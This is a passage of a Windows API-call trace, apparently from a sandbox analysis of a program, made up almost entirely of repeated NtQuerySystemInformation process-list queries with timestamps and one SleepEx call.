SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c098) returned 0x0 [0157.498] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c098) returned 0x0 [0157.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c098) returned 0x0 [0157.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c098) returned 0x0 [0157.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c098) returned 0x0 [0157.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c098) returned 0x0 [0157.504] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c098) returned 0x0 [0157.510] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c098) returned 0x0 [0157.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c098) returned 0x0 [0157.512] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c098) returned 0x0 [0157.513] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c098) returned 0x0 [0157.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c098) returned 0x0 [0157.515] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c098) returned 0x0 [0157.516] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c098) returned 0x0 [0157.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c098) returned 0x0 [0157.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c098) returned 0x0 [0157.530] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c098) returned 0x0 [0157.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c098) returned 0x0 [0157.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c098) returned 0x0 [0157.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c098) returned 0x0 [0157.537] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c098) returned 0x0 [0157.538] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c098) returned 0x0 [0157.538] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c098) returned 0x0 [0157.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c098) returned 0x0 [0157.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c098) returned 0x0 [0157.541] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c098) returned 0x0 [0157.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c098) returned 0x0 [0157.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c098) returned 0x0 [0157.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c098) returned 0x0 [0157.548] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c098) returned 0x0 [0157.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c098) returned 0x0 [0157.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c098) returned 0x0 [0157.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c098) returned 0x0 [0157.555] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0160.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19aa0) returned 0x0 [0160.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19aa0) returned 0x0 [0160.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19aa0) returned 0x0 [0160.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19aa0) returned 0x0 [0160.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19aa0) returned 0x0 [0160.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19aa0) returned 0x0 [0160.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19aa0) returned 0x0 [0160.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19aa0) returned 0x0 [0160.680] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19aa0) returned 0x0 [0160.680] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19aa0) returned 0x0 [0160.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19aa0) returned 0x0 [0160.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19aa0) returned 0x0 [0160.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19aa0) returned 0x0 [0160.688] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19aa0) returned 0x0 [0160.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19aa0) returned 0x0 [0160.690] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19aa0) returned 0x0 [0160.691] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19aa0) returned 0x0 [0160.691] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19aa0) returned 0x0 [0160.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19bb0) returned 0x0 [0160.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19bb0) returned 0x0 [0160.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19bb0) returned 0x0 [0160.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19bb0) returned 0x0 [0160.753] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19bb0) returned 0x0 [0160.754] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19bb0) returned 0x0 [0160.755] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19bb0) returned 0x0 [0160.756] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19bb0) returned 0x0 [0160.757] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19bb0) returned 0x0 [0160.763] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19bb0) returned 0x0 [0160.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19bb0) returned 0x0 [0160.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19bb0) returned 0x0 [0160.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19bb0) returned 0x0 [0160.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19bb0) returned 0x0 [0160.768] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19bb0) returned 0x0 [0160.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19bb0) returned 0x0 [0160.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19bb0) returned 0x0 [0160.799] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19bb0) returned 0x0 [0160.801] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19bb0) returned 0x0 [0160.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19bb0) returned 0x0 [0160.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19bb0) returned 0x0 [0160.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19bb0) returned 0x0 [0160.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19bb0) returned 0x0 [0160.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19bb0) returned 0x0 [0160.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19bb0) returned 0x0 [0160.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19bb0) returned 0x0 [0160.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19bb0) returned 0x0 [0160.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19bb0) returned 0x0 [0160.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19bb0) returned 0x0 [0160.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19bb0) returned 0x0 [0160.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19bb0) returned 0x0 [0160.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19bb0) returned 0x0 [0160.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19bb0) returned 0x0 [0160.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19bb0) returned 0x0 [0160.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19bb0) returned 0x0 [0160.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19bb0) returned 0x0 [0160.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19bb0) returned 0x0 [0161.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19198) returned 0x0 [0161.055] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19198) returned 0x0 [0161.056] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19198) returned 0x0 [0161.057] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19198) returned 0x0 [0161.057] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19198) returned 0x0 [0161.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19198) returned 0x0 [0161.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19198) returned 0x0 [0161.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19198) returned 0x0 [0161.065] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19198) returned 0x0 [0161.066] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19198) returned 0x0 [0161.066] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19198) returned 0x0 [0161.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19198) returned 0x0 [0161.068] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19198) returned 0x0 [0161.068] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19198) returned 0x0 [0161.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19198) returned 0x0 [0161.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19198) returned 0x0 [0161.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19198) returned 0x0 [0161.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19198) returned 0x0 [0161.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19198) returned 0x0 [0161.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19198) returned 0x0 [0161.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19198) returned 0x0 [0161.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19198) returned 0x0 [0161.084] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19198) returned 0x0 [0161.085] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19198) returned 0x0 [0161.085] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19198) returned 0x0 [0161.086] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19198) returned 0x0 [0161.087] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19198) returned 0x0 [0161.087] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19198) returned 0x0 [0161.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19198) returned 0x0 [0161.227] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191d8) returned 0x0 [0161.228] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191d8) returned 0x0 [0161.229] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191d8) returned 0x0 [0161.229] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191d8) returned 0x0 [0161.230] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191d8) returned 0x0 [0161.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191d8) returned 0x0 [0161.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191d8) returned 0x0 [0161.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191d8) returned 0x0 [0161.237] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191d8) returned 0x0 [0161.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191d8) returned 0x0 [0161.239] NtQuerySystemInformation 